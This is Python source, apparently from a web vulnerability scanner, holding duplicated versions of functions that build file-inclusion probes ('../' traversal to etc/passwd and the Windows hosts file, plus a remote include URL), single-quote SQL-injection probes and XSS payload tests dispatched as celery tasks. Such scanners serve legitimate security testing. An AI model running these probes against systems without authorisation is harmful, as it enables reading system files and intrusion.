def base_rlfi_init(link, browser_args, depth):
    """Build remote/local file-inclusion probes for *link*.

    Generates InObject probes for one remote-inclusion check plus
    local-file checks ('etc/passwd' or the Windows hosts file) at every
    traversal depth from 1 to *depth*.  The local probe set is narrowed
    by fingerprinting the Server response header.  Links without a
    query string produce no probes.
    """
    if '?' not in link:
        return []
    # Each probe pairs an inclusion target with a marker string expected
    # in the response when the inclusion succeeds.
    unix_probe = ('etc/passwd', 'root:x')
    windows_probe = ('windows/system32/drivers/etc/hosts', 'This is a sample HOSTS file')
    remote_probe = ('https://raw.github.com/twisted/twisted/trunk/NEWS', 'Ticket numbers in this file can')
    unix_hints = ('Ubuntu', 'Red Hat', 'CentOS', 'Unix', 'Debian', 'Linux', 'BSD')
    windows_hints = ('IIS', 'Microsoft', 'Win')
    header = base_scrape_headers(link, browser_args, ['server'])
    # Narrow the local-file probes when the Server header gives the OS away;
    # otherwise try both.
    if any(hint in header for hint in unix_hints):
        probes = [unix_probe]
    elif any(hint in header for hint in windows_hints):
        probes = [windows_probe]
    else:
        probes = [unix_probe, windows_probe]
    remote_url, remote_marker = remote_probe
    results = [InObject(url, key=remote_marker)
               for url in replace_params(link, remote_url, False)]
    for level in xrange(1, depth + 1):
        prefix = '../' * level
        for inclusion, marker in probes:
            for url in replace_params(link, prefix + inclusion, False):
                results.append(InObject(url, key=marker))
    return results
def base_rlfi_init(link, browser_args, depth):
    """Generate file-inclusion probe inputs for *link*.

    Builds InObject instances covering one remote-inclusion check and
    local-file traversal checks at depths 1..*depth*, with the local
    probe set chosen by the Server response header.  Returns an empty
    list when *link* has no query string to tamper with.
    """
    if '?' not in link:
        return []
    # (inclusion path, marker expected in the response on success)
    nix_key = ('etc/passwd', 'root:x')
    win_key = ('windows/system32/drivers/etc/hosts', 'This is a sample HOSTS file')
    rem_key = ('https://raw.github.com/twisted/twisted/trunk/NEWS', 'Ticket numbers in this file can')
    # Substrings that identify the server OS from its Server header.
    nix_server = ('Ubuntu', 'Red Hat', 'CentOS', 'Unix', 'Debian', 'Linux', 'BSD')
    win_server = ('IIS', 'Microsoft', 'Win')
    server = base_scrape_headers(link, browser_args, ['server'])
    # Default: try both local probes; narrow when the header matches.
    todo = [nix_key, win_key]
    if any(x in server for x in nix_server):
        todo = [nix_key]
    elif any(x in server for x in win_server):
        todo = [win_key]
    # Remote-inclusion probes first (substitute the remote URL into
    # each query parameter).
    to_input = [
        InObject(url, key=rem_key[1])
        for url in replace_params(link, rem_key[0], False)
    ]
    # Local-inclusion probes, prefixing one more '../' per depth level.
    for d in xrange(1, depth + 1):
        for inclusion, key in todo:
            path = '../' * d + inclusion
            to_input.extend([
                InObject(url, key=key)
                for url in replace_params(link, path, False)
            ])
    return to_input
def inn_base(self):
    """Load URLs from the input file and expand each parameterised one
    into SQL-injection probe variants (single-quote payload)."""
    candidates = strip_open(self.args.in_file)
    return [variant
            for url in candidates
            if '?' in url
            for variant in replace_params(url, '\'')]
def xss_init(self, my_link):
    """Seed XSS testing for *my_link*.

    Appends '<link> ||| <matches>' to ``self.output`` when DOM-based
    XSS indicators are found, queues one probe URL per payload in
    ``vectors`` onto ``self.to_input`` when the link carries query
    parameters, and queues any JavaScript files the page references.
    """
    matches = base_scan_dom(my_link, self.browser_args)
    if matches:
        # Pass my_link as a format argument rather than embedding it in
        # the template: the original built `my_link + ' ||| {}'` and
        # formatted the whole string, so a URL containing '{' or '}'
        # would raise or corrupt the report line.
        self.output.append('{0} ||| {1}'.format(my_link, matches))
    if '?' in my_link:
        for vector in vectors:
            self.to_input.extend(
                replace_params(my_link, vector, keep_original=False))
    # Referenced JS files are queued regardless of query parameters,
    # mirroring scan_xss — TODO confirm against the original layout.
    files = scan_js(my_link, self.browser_args)
    self.to_input.extend(files)
def xss_init(self, my_link):
    """Kick off XSS checks for a single crawled link.

    DOM-scan findings are recorded in ``self.output``; reflected-XSS
    candidate URLs and referenced script files are pushed onto
    ``self.to_input`` for later processing.
    """
    report_line = my_link + ' ||| {}'
    findings = base_scan_dom(my_link, self.browser_args)
    if findings:
        self.output.append(report_line.format(findings))
    if '?' in my_link:
        for payload in vectors:
            probes = replace_params(my_link, payload, keep_original=False)
            self.to_input.extend(probes)
    # NOTE(review): placement of the JS scan relative to the '?' guard is
    # ambiguous in the collapsed source; unconditional matches scan_xss.
    for script in scan_js(my_link, self.browser_args):
        self.to_input.append(script)
def scan_xss(url, browser_args, job_name, out_name):
    # Dispatch XSS scanning for one URL as celery tasks: a DOM scan of
    # the page itself, DOM scans of every JavaScript file it references,
    # and — when the URL has query parameters — reflected-XSS tests for
    # each payload vector.
    scan_dom.delay(url, browser_args, job_name, out_name)
    # Shared positional tail for every subtask below.
    args = (browser_args, job_name, out_name)
    files = scan_js(url, browser_args)
    # NOTE(review): `kwargs` is not defined in this function; unless it
    # exists at module scope this raises NameError — verify.
    group(scan_dom.subtask(
        (link,) + args, kwargs,
        **scan_xss.request.delivery_info) for link in files)()
    if '?' in url:
        # One probe URL per (parameter, payload) combination.
        sites = []
        for vector in vectors:
            sites.extend(replace_params(url, vector, False))
        group(test_xss.subtask(
            (link,) + args,
            **scan_xss.request.delivery_info) for link in sites)()
def scan_xss(url, browser_args, job_name, out_name):
    """Fan out celery XSS tasks for one URL: a DOM scan of the page,
    DOM scans of its referenced script files, and reflected-XSS tests
    per payload when the URL carries query parameters."""
    scan_dom.delay(url, browser_args, job_name, out_name)
    common = (browser_args, job_name, out_name)
    script_files = scan_js(url, browser_args)
    delivery = scan_xss.request.delivery_info
    # NOTE(review): `kwargs` is not defined locally; presumably a
    # module-level name — confirm, otherwise this is a NameError.
    group(scan_dom.subtask((link,) + common, kwargs, **delivery)
          for link in script_files)()
    if '?' not in url:
        return
    candidates = []
    for vector in vectors:
        candidates.extend(replace_params(url, vector, False))
    group(test_xss.subtask((link,) + common, **delivery)
          for link in candidates)()